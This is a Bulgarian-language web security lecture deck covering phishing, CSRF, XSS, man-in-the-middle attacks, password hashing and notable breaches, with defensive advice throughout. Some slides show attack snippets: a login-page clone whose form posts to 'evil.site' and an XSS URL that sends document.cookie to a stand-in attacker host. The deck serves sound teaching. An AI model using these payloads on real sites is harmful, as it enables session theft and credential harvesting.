Slide 1

Slide 1 text

Web Security

Slide 2

Slide 2 text

DISCLAIMER

Slide 3

Slide 3 text

Имам ~130 слайда

Slide 4

Slide 4 text

Няма да покрия темата и на 10%

Slide 5

Slide 5 text

Ще говоря и за неща, които по принцип са ясни и логични, но се оказва, че доста често ги пропускаме.

Slide 6

Slide 6 text

Ще започна с по-простите

Slide 7

Slide 7 text

Може да отегча някои от Вас

Slide 8

Slide 8 text

Да започваме?

Slide 9

Slide 9 text

Security?

Slide 10

Slide 10 text

Из речника • Сигурност, безопасност, спокойствие • Увереност, доверие • Защита, охрана • Гаранция

Slide 11

Slide 11 text

Из речника • Сигурност, безопасност, спокойствие • Увереност, доверие • Защита, охрана • Гаранция

Slide 12

Slide 12 text

Кое защитаваме?

Slide 13

Slide 13 text

Информацията?

Slide 14

Slide 14 text

Хората, които я използват!

Slide 15

Slide 15 text

Защо?

Slide 16

Slide 16 text

Доверие

Slide 17

Slide 17 text

Пари

Slide 18

Slide 18 text

План • Attack vectors • Пароли • Съвети • Стената на срама

Slide 19

Slide 19 text

Attack vectors

Slide 20

Slide 20 text

An attack vector is a path or means by which a hacker (or cracker) can gain access to a computer or website in order to deliver a payload or malicious outcome. Attack vectors enable hackers to exploit system vulnerabilities, including the human element.

Slide 21

Slide 21 text

Phishing

Slide 22

Slide 22 text

Phishing • Подобни домейни • Email spoofing • Маскиране на линкове

Slide 23

Slide 23 text

http://gmail.com/ Къде води този линк?

Slide 24

Slide 24 text

Slide 25

Slide 25 text

http://gmail.com $('.evil').on('click', function(e) { window.location = "http://evil.site/"; e.preventDefault(); });

Slide 26

Slide 26 text

Дублиране на страници $.get(‘http://website.com/login’, function(html) { $(‘body’).append(html); $(‘form’).attr(‘action’, ‘http://evil.site/login’); });

Slide 27

Slide 27 text

Дублиране на страници $.get(‘http://website.com/login’, function(html) { $(‘body’).append(html); $(‘form’).attr(‘action’, ‘http://evil.site/login’); }); Това точно няма да сработи заради Access Control Origin, но ако сървъра зареди html-a всичко ще е наред.

Slide 28

Slide 28 text

За съжаление не можем да направим много, ...

Slide 29

Slide 29 text

освен да използваме HTTPS и да насърчаваме потребителите да гледат URL-a.

Slide 30

Slide 30 text

Cross-Site Request Forgery

Slide 31

Slide 31 text

Да изтрием акаунта му Free icecream

Slide 32

Slide 32 text

Ще кажете “ама не трябва да е GET” $(‘form’).submit();

Slide 33

Slide 33 text

Какво можем да направим?

Slide 34

Slide 34 text

Synchronizer Token Pattern (CSRF Token)

Slide 35

Slide 35 text

Уникален, генериран ключ за всяко показване на формата.

Slide 36

Slide 36 text

Пази се като част от сесията и се валидира при submit.

Slide 37

Slide 37 text

Идва като вградена функционалност с доста framework-ове.

Slide 38

Slide 38 text

Cross Site Scripting (XSS)

Slide 39

Slide 39 text

Най-често използваната атака. ~40% от всички атаки

Slide 40

Slide 40 text

Приложимо, когато на страницата се показва нефилтриран текст (взет от потребител като параметър).

Slide 41

Slide 41 text

Три вида XSS

Slide 42

Slide 42 text

Non-persistent XSS

Slide 43

Slide 43 text

Non-persistent XSS http://site.com/result?error=No%20such%20user http://site.com/result?error=$.get(‘http://evil.site/?c=‘+ document.cookie);

Slide 44

Slide 44 text

Persistent XSS

Slide 45

Slide 45 text

Persistent XSS 1. Събмитваме текст в някое поле, съдържащ въпросния скрипт. 2. Потребител отваря профила ни. 3. Открадваме сесията му. 4. Логваме се с нея. 5. WIN

Slide 46

Slide 46 text

Доста по-рядко срещано, но и много по-опасно.

Slide 47

Slide 47 text

No content

Slide 48

Slide 48 text

https://blog.twitter.com/2010/all-about-onmouseover-incident

Slide 49

Slide 49 text

No content

Slide 50

Slide 50 text

http://threatpost.com/paypal-site-vulnerable-to-xss-attack/100787

Slide 51

Slide 51 text

No content

Slide 52

Slide 52 text

Какво да не правим?

Slide 53

Slide 53 text

<%= params.error %>

В ERB, EJS и някои други това е ОК, защото самия темплейт енджин кодира HTML знаците в текста.

Slide 54

Slide 54 text

var initData = <%= data.to_json %>; // …

Slide 55

Slide 55 text

var initData = { “text”: “alert(document.cookie);” }; // …

Slide 56

Slide 56 text

DOM-based XSS

Slide 57

Slide 57 text

Често при RIA сайтове

Slide 58

Slide 58 text

Разчита на подобни проблеми, но на клиента

Slide 59

Slide 59 text

DOM-based XSS var page = window.location.hash.replace(“page=“, “”); $(‘
Page ‘ + page + ’
’).appendTo(…);

Slide 60

Slide 60 text

DOM-based XSS http://site.com/#page=3 http://site.com/#page=...

Slide 61

Slide 61 text

Решението е лесно и ясно &  & <  < >  > "  " '  ' /  /

Slide 62

Slide 62 text

Докато не забравим да го приложим някъде…

Slide 63

Slide 63 text

...или го дадем на някой плъгин, който не го прави.

Slide 64

Slide 64 text

HTTP only cookies

Slide 65

Slide 65 text

Information leakage

Slide 66

Slide 66 text

No content

Slide 67

Slide 67 text

No content

Slide 68

Slide 68 text

Това е втората най-често използвана атака

Slide 69

Slide 69 text

Man-In-The-Middle attack

Slide 70

Slide 70 text

No content

Slide 71

Slide 71 text

Wi-Fi packet sniffing (подушване на пакети)

Slide 72

Slide 72 text

Не, кучето Ви не може да подуши тези пакети

Slide 73

Slide 73 text

Четене на некриптиран трафик от и до публичен hotspot. Включително пароли.

Slide 74

Slide 74 text

HTTPS

Slide 75

Slide 75 text

Пароли

Slide 76

Slide 76 text

Най-важното нещо, след номерата на банкови карти

Slide 77

Slide 77 text

Защо точно паролите?

Slide 78

Slide 78 text

Потребителите са глупави... (аз включително)

Slide 79

Slide 79 text

...преизползват пароли

Slide 80

Slide 80 text

“Passwords are never stored in plaintext. At least they shouldn't be, unless you're building the world's most insecure system using the world's most naive programmers.” - случаен човек в нета

Slide 81

Slide 81 text

protected String encodePassword(String password) { String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1"; StringBuilder result = new StringBuilder(); for (int i = 0; i < password.length(); i ++) { result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1)); } return result.toString(); }

Slide 82

Slide 82 text

protected String decodePassword(String password) { String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1"; ref = new StringBuilder(ref).reverse().toString(); StringBuilder result = new StringBuilder(); for (int i = 0; i < password.length(); i ++) { result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1)); } return result.toString(); } Java

Slide 83

Slide 83 text

conseq([X,Y|L], X, Y). conseq([_|L], X, Y) :- conseq(L, X, Y). mapNext(Code, [], []). mapNext(Code, [X|L], [Y|LRes]) :- conseq(Code, X, Y), mapNext(Code, L, LRes). ?- string_codes(' 1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1 ', Code), string_codes('123', L), mapNext(Code, L, X), write(X). Prolog

Slide 84

Slide 84 text

Whitespace

Slide 85

Slide 85 text

Security through obscurity

Slide 86

Slide 86 text

No content

Slide 87

Slide 87 text

Няма полза от това да си грозен

Slide 88

Slide 88 text

Хешове

Slide 89

Slide 89 text

Защита дори ако “изтече” базата от данни

Slide 90

Slide 90 text

MD5? SHA1? SHA256?

Slide 91

Slide 91 text

На един по-мощен настолен компютър • MD5 – 8 000 000 000 пароли в секунда • SHA1 – 3 000 000 000 пароли в секунда • SHA256 – 1 100 000 000 пароли в секунда

Slide 92

Slide 92 text

8-символна парола от букви, цифри и някои специални знаци се краква за ~ 10 часа.

Slide 93

Slide 93 text

По-бързо ако използваме rainbow таблица

Slide 94

Slide 94 text

Или пък я има в някой речник

Slide 95

Slide 95 text

Или си пуснете няколко големи Amazon EC2 GPU машини http://du.nham.ca/blog/posts/2013/03/08/password-cracking-on-amazon-ec2/ https://www.cloudcracker.com

Slide 96

Slide 96 text

Трябва ни нещо по-добро

Slide 97

Slide 97 text

Хеш със сол

Slide 98

Slide 98 text

Уникална за конкретната парола добавка, която я “разширява”.

Slide 99

Slide 99 text

Прави хеша уникален, дори да има еднакви пароли

Slide 100

Slide 100 text

Обезсмисля rainbow таблиците и забавя едновременни brute-force атаки на много пароли

Slide 101

Slide 101 text

Малко е!

Slide 102

Slide 102 text

Решението?

Slide 103

Slide 103 text

BCrypt, PBKDF2, SCrypt

Slide 104

Slide 104 text

Осоляват и хешират много пъти

Slide 105

Slide 105 text

Параметризират “бавността” на хеширане => осъкатяват brute-force-a

Slide 106

Slide 106 text

Стената на срама

Slide 107

Slide 107 text

No content

Slide 108

Slide 108 text

03.10.2013 - компрометирани 150 000 000 акаунта http://helpx.adobe.com/x-productkb/policy-pricing/customer-alert.html http://www.theguardian.com/technology/2013/nov/07/adobe-password-leak-can-check

Slide 109

Slide 109 text

No content

Slide 110

Slide 110 text

http://us.blizzard.com/en-us/securityupdate.html

Slide 111

Slide 111 text

No content

Slide 112

Slide 112 text

8 000 000 SHA1 хешове без сол http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised/ http://arstechnica.com/security/2012/06/8-million-leaked-passwords-connected-to-linkedin/

Slide 113

Slide 113 text

No content

Slide 114

Slide 114 text

Не е fail, но все пак – brute-force от 40 000 различни IP адреса. https://github.com/blog/1698-weak-passwords-brute-forced

Slide 115

Slide 115 text

No content

Slide 116

Slide 116 text

Ubuntu forums - 1 820 000 потребителски акаунти http://www.zdnet.com/ubuntu-forums-hacked-1-82m-logins-email-addresses-stolen-7000018336/

Slide 117

Slide 117 text

Random съвети

Slide 118

Slide 118 text

При неуспешен логин не казвайте кое е грешно – мейла или паролата.

Slide 119

Slide 119 text

Потвърждавайте промяната на мейл адреса и на стария мейл.

Slide 120

Slide 120 text

Защитавайте и backup сървърите

Slide 121

Slide 121 text

Блокирайте login формата при определен брой неуспешни опити, или показвайте captcha

Slide 122

Slide 122 text

Обновявайте си ОС-а на сървърите и developer-ските машини

Slide 123

Slide 123 text

No content

Slide 124

Slide 124 text

Застрашени всички потребители на iOS, MacOS http://www.cnet.com/news/apple-finally-fixes-gotofail-os-x-security-hole/

Slide 125

Slide 125 text

No content

Slide 126

Slide 126 text

No content

Slide 127

Slide 127 text

Застрашени (почти) всички потребители на Linux http://arstechnica.com/security/2014/03/critical-crypto-bug-leaves-linux-hundreds-of-apps-open-to-eavesdropping/ https://www.gitorious.org/gnutls/gnutls/commit/6aa26f78150ccbdf0aec1878a41c17c41d358a3b

Slide 128

Slide 128 text

Windows is next

Slide 129

Slide 129 text

No content

Slide 130

Slide 130 text

http://arstechnica.com/security/2013/10/hack-of-mongohq-exposes-passwords-user-databases-to-intruders/

Slide 131

Slide 131 text

No content

Slide 132

Slide 132 text

Social engineering http://www.wired.com/gadgetlab/2012/08/apple-amazon-mat-honan-hacking/

Slide 133

Slide 133 text

egov.bg

Slide 134

Slide 134 text

egov.bg /document?eDocId=base64(<пореден номер>) http://blog.bozho.net/?p=1327

Slide 135

Slide 135 text

И най-добрият съвет...

Slide 136

Slide 136 text

Use it!

Slide 137

Slide 137 text

Благодаря за вниманието!

Slide 138

Slide 138 text

Благодаря за вниманието! Разбрах, че котките помагали в презентации.